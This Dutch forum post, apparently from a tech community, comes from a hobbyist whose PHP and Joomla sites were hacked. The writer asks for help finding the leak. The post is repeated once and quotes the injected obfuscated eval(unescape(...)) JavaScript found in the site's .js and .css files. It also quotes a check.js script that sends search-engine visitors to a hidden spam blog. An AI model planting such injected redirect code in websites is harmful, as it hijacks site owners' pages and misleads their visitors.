Ik heb voor de hobby een aantal site. 2 sites zijn zelf gemaakt op basis van PHP en 2 andere zijn gemaakt met behulp van Joomla/Mambo.
Wat is er aan de hand?
Ik moest toevallig op mijn site zijn en kwam erachter dat er een een of ander BLOG wordt getoond.
Kijk zelf maar : www.cpu-info.com
Je krijgt het volgende te zien :
Terwijl het dus dit moet zijn :
Het volgende heb ik gevonden
In de HTML files is niets te vinden. In alle .js en .css files die ik gebruik wel , daar is het volgende toegevoegd : /* a0b4df006e02184c60dbf503e71c87ad */ ;eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%
65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%
31%20%3D%20%35%34%3B%20%4A%53%53%32%20%3D%20%38%34%30%34%36%3B%20%4A%
53%53%33%20%3D%20%27%2F%68%6F%75%74%64%75%69%66%2F%6D%61%6D%62%6F%74%
73%2F%65%64%69%74%6F%72%73%2F%74%69%6E%79%6D%63%65%2F%6A%73%63%72%69%
70%74%73%2F%74%69%6E%79%5F%6D%63%65%2F%68%61%6C%75%70%61%76%2F%64%75%
6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%
6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%
69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%
27%73%72%63%27%2C%20%27%2F%68%6F%75%74%64%75%69%66%2F%6D%61%6D%62%6F%
74%73%2F%65%64%69%74%6F%72%73%2F%74%69%6E%79%6D%63%65%2F%6A%73%63%72%
69%70%74%73%2F%74%69%6E%79%5F%6D%63%65%2F%68%61%6C%75%70%61%76%2F%63%
68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%
75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%
6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%
6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%
6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20')); /* 995d2cc661fa72452472e9554b5520c */
Door dit weg te halen krijg ik allemaal Server connection errors.
Ik heb nog een verwijzing gevonden via "last visited" van CPANEL naar een locatie in een Joomla site directory daar staan de volgende files :
Die htm files bevatten dus de Blog site en de check.js file heeft de volgende inhoud :
if ( (Math.random()*60 < JSS1) && document.referrer.match(/^http:\/\/([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|
yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|
aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\./) && document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|
search_string|search_word|buscar|text|words|su|qt|rdata)\=/) && !document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|
search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)/) ){ location.href=JSS3+'?r='+encodeURIComponent(document.referrer)+'&s='+JSS2; };
Kan iemand mij helpen om het lek boven te krijgen? Ik heb de sites voor mijn lol, k**** hacker!
Wat is er aan de hand?
Ik moest toevallig op mijn site zijn en kwam erachter dat er een een of ander BLOG wordt getoond.
Kijk zelf maar : www.cpu-info.com
Je krijgt het volgende te zien :
Terwijl het dus dit moet zijn :
Het volgende heb ik gevonden
In de HTML files is niets te vinden. In alle .js en .css files die ik gebruik wel , daar is het volgende toegevoegd : /* a0b4df006e02184c60dbf503e71c87ad */ ;eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%
65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%
31%20%3D%20%35%34%3B%20%4A%53%53%32%20%3D%20%38%34%30%34%36%3B%20%4A%
53%53%33%20%3D%20%27%2F%68%6F%75%74%64%75%69%66%2F%6D%61%6D%62%6F%74%
73%2F%65%64%69%74%6F%72%73%2F%74%69%6E%79%6D%63%65%2F%6A%73%63%72%69%
70%74%73%2F%74%69%6E%79%5F%6D%63%65%2F%68%61%6C%75%70%61%76%2F%64%75%
6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%
6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%
69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%
27%73%72%63%27%2C%20%27%2F%68%6F%75%74%64%75%69%66%2F%6D%61%6D%62%6F%
74%73%2F%65%64%69%74%6F%72%73%2F%74%69%6E%79%6D%63%65%2F%6A%73%63%72%
69%70%74%73%2F%74%69%6E%79%5F%6D%63%65%2F%68%61%6C%75%70%61%76%2F%63%
68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%
75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%
6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%
6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%
6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20')); /* 995d2cc661fa72452472e9554b5520c */
Door dit weg te halen krijg ik allemaal Server connection errors.
Ik heb nog een verwijzing gevonden via "last visited" van CPANEL naar een locatie in een Joomla site directory daar staan de volgende files :
Die htm files bevatten dus de Blog site en de check.js file heeft de volgende inhoud :
if ( (Math.random()*60 < JSS1) && document.referrer.match(/^http:\/\/([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|
yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|
aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\./) && document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|
search_string|search_word|buscar|text|words|su|qt|rdata)\=/) && !document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|
search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)/) ){ location.href=JSS3+'?r='+encodeURIComponent(document.referrer)+'&s='+JSS2; };
Kan iemand mij helpen om het lek boven te krijgen? Ik heb de sites voor mijn lol, k**** hacker!
Processor informatie -> www.cpu-info.com & www.coprocessor.info
:strip_icc():strip_exif()/u/93041/wwvbw.jpg?f=community)
/u/48537/ktm_klein.png?f=community)
:strip_icc():strip_exif()/u/49652/HomerInBlack2.jpg?f=community)
:strip_icc():strip_exif()/u/6753/overlord_avatar-3.jpg?f=community){kind=avatar}
:strip_icc():strip_exif()/u/22092/crop5fa8360e95568_cropped.jpeg?f=community)
:strip_icc():strip_exif()/u/192890/brain.jpg?f=community)
/u/34907/qs-logo.png?f=community){kind=logo}
:strip_icc():strip_exif()/u/193117/i.jpeg?f=community)
